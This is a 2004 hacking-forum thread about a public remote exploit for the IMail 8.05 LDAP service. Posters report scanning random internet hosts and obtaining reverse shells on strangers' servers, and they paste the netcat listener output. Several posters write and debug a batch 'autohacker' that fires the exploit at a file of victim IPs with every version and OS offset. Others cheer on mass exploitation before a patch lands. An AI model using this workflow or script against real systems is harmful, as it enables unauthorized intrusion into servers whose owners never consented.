[crpt] Imail V8.05 Ldap Service Remote Sploit By K

Sedolf

Feb 20 2004, 03:22 PM

Here is your proper TCP Reply...I did some scans..IP # 2489 worked

TCP ports: 25

TCP 25:
[220 *.*.*.se (IMail 8.05 21779-3) NT-ESMTP Server X1]

Now just need to know which os o.O

EDIT: I just dared to hack it, all os, all versions...no shell, no crash...NOW its strange! I think this exploit is crap..

Arnie

Feb 20 2004, 03:42 PM

why the <censor> are you posting the ip from someone who happen to have imail installed??

DiJiTooL

Feb 20 2004, 03:44 PM

try with the combinaison 0 1
this combinaison seem to be universel
if i use the profesional offset on my evaluation version i get a shell
and ph33r @coromputer have tested with the winxp offset on his 2k machine and he got a shell

Raedemer

Feb 21 2004, 10:24 AM

QUOTE (Sedolf @ Feb 20 2004, 03:22 PM)

EDIT: I just dared to hack it, all os, all versions...no shell, no crash...NOW its strange! I think this exploit is crap..

I don't think so, try your own imail server before saying this exploit is crap ! I think kralor tested it succesfully before bringing this exploit to public.

equinox

Feb 21 2004, 10:48 AM

no one should call kralor or his exploits crap hes a dude bringing the best exploits around, i have compiled it fine in VS6 no shell yet but imail is very rare, exploit is fine its the hosts that suck

MxMx

Feb 21 2004, 10:51 AM

QUOTE (equinox @ Feb 21 2004, 10:48 AM)

no one should call kralor or his exploits crap hes a dude bringing the best exploits around, i have compiled it fine in VS6 no shell yet but imail is very rare, exploit is fine its the hosts that suck

yea tru tru ..
there are very few hosts which have installed Imail ..
but the exploit itself is really great

matze

Feb 22 2004, 11:14 AM

Scanning with Scan1000.exe on port 389

+----------------------------------------------------+
ª iMail LDAP Autohacker ª
ª v3.12.10.3/v8.05 ª
+----------------------------------------------------+

please enter your ip: xx.xx.xx.xxx
please enter your listening port:
please enter iMail version: 0
please enter Target OS: 1

[+]------------------------------------------------------[+]
[+] checking banner on xx.xx.xx.xxx ...
[+] Found iMail Server 8.05 !!

[+] Connecting to xx.xx.xx.xxx ...Done
[+] Sending magic packet ...Done
[+] Starting autoh4x0r and sending commands MASTER !!
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32\

and Boom the shell is Open

mfg
matze

OldSkool

Feb 22 2004, 11:25 AM

hm u did enter target OS: 1 (its XP)

and you get a win2000 shell

?

Leonnetje

Feb 22 2004, 11:59 AM

Matze, can you please paste the code for that Auto-hacker in here ?? Or attach the file or make a download-link ???

I'm very curious what's in there.....

matze

Feb 22 2004, 12:08 PM

yes

version
0 <---8.05 professional
os version
1 <---- windows xp universal

and it get a win2000shell

mfg
matze

Leonnetje

Feb 22 2004, 12:17 PM

I see, it's in the download-section... :/

2 Bad i can't download it... we'll have to figure something out myself then

matze

Feb 22 2004, 12:24 PM

Leonnetje

QUOTE

Matze, can you please paste the code for that Auto-hacker in here ?? Or attach the file or make a download-link ???

I'm very curious what's in there.....

you can get the autohaxxor in the download section

mfg
matze

Leonnetje

Feb 22 2004, 12:50 PM

QUOTE (matze @ Feb 22 2004, 12:24 PM)

you can get the autohaxxor in the download section

mfg
matze

Unfortunately i can't download stuff from there... you need to have 50 postings to axx that section

Janosch

Feb 22 2004, 01:13 PM

nice matze, well done

which version of the exploit do you use?

imail1.1exe or an older one?

matze

Feb 22 2004, 01:21 PM

QUOTE

nice matze, well done

which version of the exploit do you use?

imail1.1exe or an older one?

yes i use the old autohaxxer and you must rename the imail1.1exe to mail.exe

on listening port <--- you must press return

Feuerstein

Feb 22 2004, 02:07 PM

im glad to announce having had a shell, too

CODE

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>nc -lvp 5555
listening on [any] 5555 ...
*.*.*.*: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [*.*.*.*] from (UNKNOWN) [*.*.*.*] 1045: NO_DATA

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\SYSTEM32>
C:\WINNT\SYSTEM32>

y0 guys, it works

i used sploit from Corumputer

any suggestions howto secure ?

dragonfly

Feb 22 2004, 02:10 PM

wow Feuerstein hehe very nice indeed and is it fast

?

peter_BB

Feb 22 2004, 02:37 PM

exploitable systems seem rare but the sploit works yeah... but guess it will be patched soon

dragonfly

Feb 22 2004, 02:40 PM

yeah so lets rock now and exploit the servers now!

jpno5

Feb 22 2004, 03:56 PM

heres the patch if any 1 wants it

hotfix

Feuerstein

Feb 22 2004, 04:01 PM

ah, jpno5, thx a lot

but do ya know any cmdline options to run in silent mode ?

MxMx

Feb 22 2004, 04:14 PM

QUOTE (jpno5 @ Feb 22 2004, 03:56 PM)

heres the patch if any 1 wants it

hotfix

this hotfix is still vuln.

a friend of mine tested it yesterday ..

Max_Payne

Feb 22 2004, 05:14 PM

seems obvious to everyone that the exploit really works

the only thing now is that servers running iMail 8.05 are very rare..haven't found 1 yet and i've done quite a bit of searching

usch

Feb 22 2004, 05:21 PM

i dont agree with you.i've found some within 15 minutes of scanning and got 1 shell till now

dragonfly

Feb 22 2004, 05:39 PM

how do you know the version/os of the server then

Feuerstein

Feb 22 2004, 05:40 PM

QUOTE (dragonfly @ Feb 22 2004, 07:39 PM)

how do you know the version/os of the server then

just hammer all 6 combinations within 3 seconds on to the server and be lucky

QUOTE (jpno5 @ Feb 22 2004, 03:56 PM)

this hotfix is still vuln.

a friend of mine tested it yesterday ..

did ya find a better one ?

Demoman

Feb 22 2004, 06:51 PM

CODE

echo off
cls
echo +---------------------------------------------------------+
echo ¦ IMail Autohacker ¦
echo ¦ (c) 2004 by Demoman ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p ownip= Enter Your IP:
set /p vicip= Enter the Victims's IP:
set /p ncport= Enter the NC's listening port:
echo.
imail.exe %vicip% %ownip% %ncport% 0 0
imail.exe %vicip% %ownip% %ncport% 1 0
imail.exe %vicip% %ownip% %ncport% 2 0
imail.exe %vicip% %ownip% %ncport% 0 1
imail.exe %vicip% %ownip% %ncport% 1 1
imail.exe %vicip% %ownip% %ncport% 2 1

That is a very easy version of an autohacker. You must still have nc listening and you can check only single ips. DonT think its professionel or something, because it is only a batchfile.

Greetz Demoman

dragonfly

Feb 22 2004, 07:16 PM

wow nice is it possible to get it from a .txt file ??
thanks

Siliconized

Feb 22 2004, 07:23 PM

CODE

echo off
cls
echo +---------------------------------------------------------+
echo ¦ IMail Autohacker ¦
echo ¦ (c) 2004 by Demoman ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p ownip= Enter Your IP:
set /p file= Enter the Filename:
set /p ncport= Enter the NC's listening port:
echo.
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 0
for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 1 0
for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 2 0
for /f "eol=; tokens=1*" %%i in (%file%) doimail.exe %vicip% %ownip% %ncport% 0 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 1

Done a bit modification and that may help you if u got a file with ip

Demoman

Feb 22 2004, 07:26 PM

QUOTE

echo off
cls
echo +---------------------------------------------------------+
echo ¦ IMail Autohacker ¦
echo ¦ © 2004 by Demoman ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p file= Enter the Filename:
If "%file%" =="" GoTo CLS
set /p ownip= Enter Your IP:
set /p file= Enter the Filename:
set /p ncport= Enter the NC's listening port:
echo.
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 0 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 1 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %vicip% %ownip% %ncport% 2 1
CLS

Yes Siliconized, i have this version too. (fixed one thing)

dragonfly

Feb 22 2004, 07:31 PM

srry m8 but that one doesn't work

dragonfly

Feb 22 2004, 07:45 PM

what to do?
Can someone fix the bug because none works (only the single ip)

Demoman

Feb 22 2004, 07:45 PM

okay i willl fix it

QUOTE

echo off
cls
echo +---------------------------------------------------------+
echo ¦ IMail Autohacker ¦
echo ¦ © 2004 by Demoman ¦
echo +---------------------------------------------------------+
echo.
echo.
set /p file= Enter the Filename:
set /p ownip= Enter Your IP:
set /p ncport= Enter the NC's listening port:
echo.
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 0 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 1 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 2 0
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 0 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 1 1
for /f "eol=; tokens=1*" %%i in (%file%) do imail.exe %%i %ownip% %ncport% 2 1

dragonfly

Feb 22 2004, 07:55 PM

LOL still doesn't work

thnx for trying m8 but still nothing hehehe

dragonfly

Feb 22 2004, 07:58 PM

it keep saying:

error: <port> must be between 1 and 65535

Demoman

Feb 22 2004, 08:07 PM

yes that is the normal portrange. What did you type in??

dragonfly

Feb 22 2004, 08:21 PM

just port 99
you try!!

Demoman

Feb 22 2004, 08:24 PM

QUOTE

+---------------------------------------------------------+
ª IMail Autohacker    ª
ª ® 2004 by Demoman       ª
+---------------------------------------------------------+

Enter the Filename: result.txt
Enter Your IP: xxx.xxx.xxx.xxx
Enter the NC's listening port: 99

   [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]
   www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xxx.xx.x ...Done
[+] Sending magic packet    ...Done

   [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit by kralor [Crpt]
   www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.xxx.x    ...Done
[+] Sending magic packet    ...Done

Everything works fine

dragonfly

Feb 22 2004, 08:25 PM

hmm weird

i don't get it

dragonfly

Feb 22 2004, 08:31 PM

wowie it works now

thnx a million demoman

Leonnetje

Feb 23 2004, 08:38 AM

QUOTE (Demoman @ Feb 22 2004, 06:51 PM)

That is a very easy version of an autohacker. You must still have nc listening and you can check only single ips. DonT think its professionel or something, because it is only a batchfile.

Greetz Demoman

Tnx Demoman !! That'll do the job, now let's test this thingy....

MasteriX

Feb 23 2004, 05:02 PM

demoman's one works altough i haven't got a shell yet

Leonnetje

Feb 23 2004, 06:58 PM

QUOTE (MasteriX @ Feb 23 2004, 05:02 PM)

demoman's one works altough i haven't got a shell yet

Same here.... no shells.

Not even vulnerable scans ...

DerangeD

Feb 23 2004, 08:16 PM

I had one shell but it closed after my first command

well i will keep trying

yeyo

Feb 24 2004, 05:14 PM

I didn't try it personally, but I have a friend that got some shells

I'll ask him how he did it

so, the exploit works

ssapp

Feb 24 2004, 07:32 PM

the folks thats saying no shells yet I think are just scanning 389 and running the sploit on those boxes......you need to do a banner scan to see if you are actually attacking imail boxes.......they are very few and beyond

Leonnetje

Feb 24 2004, 07:47 PM

QUOTE (ssapp @ Feb 24 2004, 07:32 PM)

the folks thats saying no shells yet I think are just scanning 389 and running the sploit on those boxes......you need to do a banner scan to see if you are actually attacking imail boxes.......they are very few and beyond

That's exactly the problem... there aren't many vulnerable hosts out there, cause almost no host is running on iMail version 8.05.

And yes... i always do a banner scan

noxx

Feb 24 2004, 09:40 PM

thats true, i scanned many ips and i didn't find any imail server... i think there are many better programs so nobody uses imail

MysteryMan

Feb 26 2004, 01:01 PM

hmm i try mayby i do something with this

...

thanks

Niekos

Mar 8 2004, 09:03 PM

Hi,

Can some one explain a few things for me?
What's nc?
And could some one plz put down some steps to use this exploit?
I think they are:

1. Scan 389
2. Check for correct version of imap
3. Get OS
4. Use exploit
5. BUT THEN??
6. Must you get a shell in a dos box??

Thx in advance